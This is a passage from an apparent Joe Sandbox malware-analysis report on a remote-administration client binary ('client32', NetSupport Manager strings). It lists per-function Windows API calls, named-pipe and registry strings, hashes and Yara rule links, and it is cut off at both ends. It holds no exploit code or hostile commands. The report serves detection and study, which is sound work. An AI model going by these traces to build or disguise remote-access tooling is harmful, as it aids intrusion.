                                                                                                                                                                  • Part of subcall function 1116B64B: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,1116959F,11169585,111DBD20,00000008,11169670,?,?,?,111DBD40,0000000C,1116972B,?), ref: 11173629
                                                                                                                                                                  • Part of subcall function 1116B64B: _free.LIBCMT ref: 1117362C
                                                                                                                                                                  • Part of subcall function 1116B64B: DeleteCriticalSection.KERNEL32(00000019,?,?,1116959F,11169585,111DBD20,00000008,11169670,?,?,?,111DBD40,0000000C,1116972B,?), ref: 11173653
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 1116B996
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 1116B9A3
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 1116B9B0
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 1116B9BD
                                                                                                                                                                • TlsAlloc.KERNEL32(?,?,111694DC,111DBD20,00000008,11169670,?,?,?,111DBD40,0000000C,1116972B,?), ref: 1116BA0D
                                                                                                                                                                • TlsSetValue.KERNEL32(00000000,?,?,111694DC,111DBD20,00000008,11169670,?,?,?,111DBD40,0000000C,1116972B,?), ref: 1116BA28
                                                                                                                                                                • __init_pointers.LIBCMT ref: 1116BA32
                                                                                                                                                                • EncodePointer.KERNEL32(?,?,111694DC,111DBD20,00000008,11169670,?,?,?,111DBD40,0000000C,1116972B,?), ref: 1116BA43
                                                                                                                                                                • EncodePointer.KERNEL32(?,?,111694DC,111DBD20,00000008,11169670,?,?,?,111DBD40,0000000C,1116972B,?), ref: 1116BA50
                                                                                                                                                                • EncodePointer.KERNEL32(?,?,111694DC,111DBD20,00000008,11169670,?,?,?,111DBD40,0000000C,1116972B,?), ref: 1116BA5D
                                                                                                                                                                • EncodePointer.KERNEL32(?,?,111694DC,111DBD20,00000008,11169670,?,?,?,111DBD40,0000000C,1116972B,?), ref: 1116BA6A
                                                                                                                                                                • DecodePointer.KERNEL32(Function_0016B7CF,?,?,111694DC,111DBD20,00000008,11169670,?,?,?,111DBD40,0000000C,1116972B,?), ref: 1116BA8B
                                                                                                                                                                • __calloc_crt.LIBCMT ref: 1116BAA0
                                                                                                                                                                • DecodePointer.KERNEL32(00000000,?,?,111694DC,111DBD20,00000008,11169670,?,?,?,111DBD40,0000000C,1116972B,?), ref: 1116BABA
                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 1116BACC
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                                                                                • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                                                • API String ID: 3698121176-3819984048
                                                                                                                                                                • Opcode ID: 8ec48f1a047daf616742b568f1d57b4471b92bf0689ee590aef20c437b638c51
                                                                                                                                                                • Instruction ID: 8c197aedc407595bd33f0851878198814bb45be6e0f0f0d5f3e2140db13e3365
                                                                                                                                                                • Opcode Fuzzy Hash: 8ec48f1a047daf616742b568f1d57b4471b92bf0689ee590aef20c437b638c51
                                                                                                                                                                • Instruction Fuzzy Hash: A531A0B5A043269FD7019F768C94A4AFFA8FB4637C704063AE430C3298EBB28455CF54
                                                                                                                                                                Function 110F75E0 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 212windowlibraryloaderCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(User32.dll,59FD48C0), ref: 110F7616
                                                                                                                                                                  • Part of subcall function 111450A0: GetVersionExA.KERNEL32(111F0EF0,76968400), ref: 111450D0
                                                                                                                                                                  • Part of subcall function 111450A0: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114510F
                                                                                                                                                                  • Part of subcall function 111450A0: _memset.LIBCMT ref: 1114512D
                                                                                                                                                                  • Part of subcall function 111450A0: _strncpy.LIBCMT ref: 111451FA
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SetProcessDPIAware), ref: 110F76BF
                                                                                                                                                                • SetCursor.USER32(00000000,?,00000000,?,00000104), ref: 110F776E
                                                                                                                                                                • ShowCursor.USER32(00000000,?,00000104), ref: 110F777B
                                                                                                                                                                • OpenEventA.KERNEL32(00100000,00000000,NSLockExit,?,00000104), ref: 110F778C
                                                                                                                                                                • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000BF), ref: 110F77B3
                                                                                                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110F77CA
                                                                                                                                                                • TranslateMessage.USER32(?), ref: 110F77DB
                                                                                                                                                                • DispatchMessageA.USER32(?), ref: 110F77E4
                                                                                                                                                                • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000BF), ref: 110F77FB
                                                                                                                                                                • CloseHandle.KERNEL32(?,?,00000104), ref: 110F780E
                                                                                                                                                                  • Part of subcall function 11145AE0: LoadLibraryA.KERNEL32(shcore.dll,00000000,?,11030690,00000002), ref: 11145AFF
                                                                                                                                                                  • Part of subcall function 11145AE0: GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 11145B11
                                                                                                                                                                  • Part of subcall function 11145AE0: FreeLibrary.KERNEL32(00000000,?,11030690,00000002), ref: 11145B24
                                                                                                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110F7826
                                                                                                                                                                • TranslateMessage.USER32(?), ref: 110F7837
                                                                                                                                                                • DispatchMessageA.USER32(?), ref: 110F7844
                                                                                                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110F7854
                                                                                                                                                                • ShowCursor.USER32(00000001,?,00000104), ref: 110F785C
                                                                                                                                                                • SetCursor.USER32(?,?,00000104), ref: 110F7869
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,0000004C,?,00000104), ref: 110F788E
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Message$CursorLibrary$AddressDispatchFreeLoadMultipleObjectsOpenProcShowTranslateWait$CloseEventHandleVersion_memset_strncpy
                                                                                                                                                                • String ID: NSLockExit$SetProcessDPIAware$User32.dll
                                                                                                                                                                • API String ID: 2007862282-1780497338
                                                                                                                                                                • Opcode ID: 113c0b6181b972a0f2d320b7b092a92c9fbda70bcbeef0429ce4b10eb86d636e
                                                                                                                                                                • Instruction ID: 11ede5f5f02855a1c4c96f48d72256e6443f30e2e936632b213269d4ffb78123
                                                                                                                                                                • Opcode Fuzzy Hash: 113c0b6181b972a0f2d320b7b092a92c9fbda70bcbeef0429ce4b10eb86d636e
                                                                                                                                                                • Instruction Fuzzy Hash: 7E8150B1D04229AFDB14DF658C85BEEFBB8BB48708F4045E9E519E3240EB309A84CF51
                                                                                                                                                                Function 111456A0 Relevance: 38.6, APIs: 11, Strings: 11, Instructions: 58libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 11143110: GetModuleFileNameA.KERNEL32(00000000,?,00000100,00000000), ref: 1114314B
                                                                                                                                                                  • Part of subcall function 11143110: _strrchr.LIBCMT ref: 1114315A
                                                                                                                                                                  • Part of subcall function 11143110: _strrchr.LIBCMT ref: 1114316A
                                                                                                                                                                  • Part of subcall function 11143110: wsprintfA.USER32 ref: 11143185
                                                                                                                                                                • GetModuleHandleA.KERNEL32(NSMTRACE,11194AB8), ref: 111456BA
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,NSMTraceLoad), ref: 111456D5
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,NSMTraceUnload), ref: 111456E2
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,NSMTraceGetConfigItem), ref: 111456EF
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,NSMTraceGetConfigInt), ref: 111456FC
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,vRealNSMTrace), ref: 11145709
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,NSMTraceClose), ref: 11145716
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,NSMTraceReadConfigItemFromFile), ref: 11145723
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,NSMTraceExclusive), ref: 11145730
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,NSMTraceUnexclusive), ref: 1114573D
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,NSMTraceSetModuleName), ref: 1114574A
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc$Module_strrchr$FileHandleNamewsprintf
                                                                                                                                                                • String ID: NSMTRACE$NSMTraceClose$NSMTraceExclusive$NSMTraceGetConfigInt$NSMTraceGetConfigItem$NSMTraceLoad$NSMTraceReadConfigItemFromFile$NSMTraceSetModuleName$NSMTraceUnexclusive$NSMTraceUnload$vRealNSMTrace
                                                                                                                                                                • API String ID: 3896832720-3703587661
                                                                                                                                                                • Opcode ID: 84df2d00e24e8d8ae3685d9949c465087890092b11522e3ff6f09728c44b768d
                                                                                                                                                                • Instruction ID: 73e471d2bd7e465e00d80a1379dd27e839b9bac49e05384ada1c81eae7e3fc15
                                                                                                                                                                • Opcode Fuzzy Hash: 84df2d00e24e8d8ae3685d9949c465087890092b11522e3ff6f09728c44b768d
                                                                                                                                                                • Instruction Fuzzy Hash: 2201CC7191127666D751BFBA9C98FC7FEEA9B89218B010476F068E3206D6B484448F94
                                                                                                                                                                Function 110EF560 Relevance: 36.2, APIs: 24, Instructions: 222windowmemoryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetObjectA.GDI32(?,00000018,?), ref: 110EF57E
                                                                                                                                                                • GetStockObject.GDI32(0000000F), ref: 110EF592
                                                                                                                                                                • GetDC.USER32(00000000), ref: 110EF60A
                                                                                                                                                                • SelectPalette.GDI32(00000000,00000000,00000000), ref: 110EF61B
                                                                                                                                                                • RealizePalette.GDI32(00000000), ref: 110EF621
                                                                                                                                                                • GlobalAlloc.KERNEL32(00000042,?,00000000), ref: 110EF63C
                                                                                                                                                                • SelectPalette.GDI32(00000000,?,00000001), ref: 110EF650
                                                                                                                                                                • RealizePalette.GDI32(00000000), ref: 110EF653
                                                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 110EF65B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Palette$ObjectRealizeSelect$AllocGlobalReleaseStock
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1969595663-0
                                                                                                                                                                • Opcode ID: d9190b611ba9219ad8d2ec95f6d096b1821b31785eb756edf59b9680528b31f1
                                                                                                                                                                • Instruction ID: 22353c804f3d3f151c6f3a8f6fada681deec080e0441dcd20cd58669b66000eb
                                                                                                                                                                • Opcode Fuzzy Hash: d9190b611ba9219ad8d2ec95f6d096b1821b31785eb756edf59b9680528b31f1
                                                                                                                                                                • Instruction Fuzzy Hash: 8E7191B6E11228AFDB04DFA5CC88BEEF7B9FF48704F04412AF515E7244D67499018BA1
                                                                                                                                                                Function 110F5950 Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 179filesleeppipeCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • wsprintfA.USER32 ref: 110F5988
                                                                                                                                                                  • Part of subcall function 1110F340: SetEvent.KERNEL32(00000000,?,1102C44F), ref: 1110F364
                                                                                                                                                                • wsprintfA.USER32 ref: 110F59DA
                                                                                                                                                                  • Part of subcall function 110F33F0: LocalAlloc.KERNEL32(00000040,00000014,?,00000000), ref: 110F33FC
                                                                                                                                                                  • Part of subcall function 110F33F0: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 110F3425
                                                                                                                                                                  • Part of subcall function 110F33F0: SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 110F3432
                                                                                                                                                                  • Part of subcall function 110F33F0: CreateNamedPipeA.KERNEL32(?,00000003,00000006,00000001,?,?,000003E8,?), ref: 110F3463
                                                                                                                                                                  • Part of subcall function 110F33F0: GetLastError.KERNEL32 ref: 110F3470
                                                                                                                                                                  • Part of subcall function 110F33F0: Sleep.KERNEL32(000003E8), ref: 110F348F
                                                                                                                                                                  • Part of subcall function 110F33F0: CreateNamedPipeA.KERNEL32(?,00000003,00000006,00000001,00000001,?,000003E8,0000000C), ref: 110F34AE
                                                                                                                                                                  • Part of subcall function 110F33F0: LocalFree.KERNEL32(?), ref: 110F34BF
                                                                                                                                                                • wsprintfA.USER32 ref: 110F5A1E
                                                                                                                                                                • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 110F5A4A
                                                                                                                                                                • Sleep.KERNEL32(000003E8), ref: 110F5A5C
                                                                                                                                                                • SetNamedPipeHandleState.KERNEL32(00000000,?,00000000,00000000), ref: 110F5A79
                                                                                                                                                                • ReadFile.KERNEL32(?,?,00010000,?,00000000), ref: 110F5AE3
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 110F5B1E
                                                                                                                                                                • GetLastError.KERNEL32 ref: 110F5B2C
                                                                                                                                                                • InterlockedExchange.KERNEL32(?,00000000), ref: 110F5B38
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 110F5B43
                                                                                                                                                                • SetEvent.KERNEL32(00000270), ref: 110F5B5A
                                                                                                                                                                • InterlockedExchange.KERNEL32(?,00000000), ref: 110F5B6C
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 110F5B73
                                                                                                                                                                • InterlockedExchange.KERNEL32(?,00000000), ref: 110F5B7F
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 110F5B89
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Handle$Close$CreateExchangeInterlockedNamedPipewsprintf$DescriptorErrorEventFileLastLocalSecuritySleep$AllocDaclFreeInitializeReadState
                                                                                                                                                                • String ID: VistaUIPipe%d$\\.\pipe\nsm_%s$\\.\pipe\nsm_vistapipe%d
                                                                                                                                                                • API String ID: 314772441-3428003663
                                                                                                                                                                • Opcode ID: 5edb563096daf5830fa12ef569c1a7c24e09949c0a52532e50ff9f61841b0b84
                                                                                                                                                                • Instruction ID: bc2e2c65ab037f4e49fc19a0848c9f8c0e457000ff0deb98ec24630af83a0244
                                                                                                                                                                • Opcode Fuzzy Hash: 5edb563096daf5830fa12ef569c1a7c24e09949c0a52532e50ff9f61841b0b84
                                                                                                                                                                • Instruction Fuzzy Hash: 5A619075E1022AABD715CF64CC85FDAB7B8BF0C714F104194E955A7280EBB5A980CFA0
                                                                                                                                                                Function 11133400 Relevance: 30.1, APIs: 2, Strings: 15, Instructions: 381COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: __strdup_free
                                                                                                                                                                • String ID: CheckRMLocation, SetChannel to [%s]$CheckRMLocation, check machine key$CheckRMLocation, check user key$CheckRMLocation, opened user key$CheckRMLocation, read [%s] from config$Client$Current Location$CurrentLocation$IsA()$RM user location=%s, assumed roaming$RoomSpec$SOFTWARE\RM\Connect$SOFTWARE\Research Machines\Network Management\Location Chooser$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$wwww
                                                                                                                                                                • API String ID: 514621754-348489473
                                                                                                                                                                • Opcode ID: cd29cf232fe3fa5b76202ab786b7943c724fd67e21c77a8ff7effdeddf23fd08
                                                                                                                                                                • Instruction ID: be1923504c83985266732e1f2b9d3f53618397ddbaed6cfbbf11352fa9892fcf
                                                                                                                                                                • Opcode Fuzzy Hash: cd29cf232fe3fa5b76202ab786b7943c724fd67e21c77a8ff7effdeddf23fd08
                                                                                                                                                                • Instruction Fuzzy Hash: 96D1B179E1010A9FDB01DFA4DD90FEDF370AF9431DF408164E825A7389EA35A605C7A5
                                                                                                                                                                Function 11105630 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 183libraryloaderCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 11105664
                                                                                                                                                                • EnterCriticalSection.KERNEL32(111F060C), ref: 1110567D
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 11105683
                                                                                                                                                                • wsprintfA.USER32 ref: 111056ED
                                                                                                                                                                • LoadLibraryA.KERNEL32(Kernel32.dll,?), ref: 1110572F
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 111057B0
                                                                                                                                                                • SetLastError.KERNEL32(00000078), ref: 111057C9
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000010,00000000,00000000), ref: 111057FD
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 11105887
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(111F060C), ref: 11105890
                                                                                                                                                                Strings
                                                                                                                                                                • Warning. simap lock held for %d ms, xrefs: 111058A4
                                                                                                                                                                • Session\%u\NSMWClass, xrefs: 111056E7
                                                                                                                                                                • PostMessage WMCLOSE to s%d (%d) ret %d, xrefs: 111057EB
                                                                                                                                                                • Error. IPC(%s) = %s, xrefs: 1110571D
                                                                                                                                                                • Warning. took %d ms to get simap lock, xrefs: 11105693
                                                                                                                                                                • Kernel32.dll, xrefs: 1110572A
                                                                                                                                                                • GetProcessId, xrefs: 111057A8
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
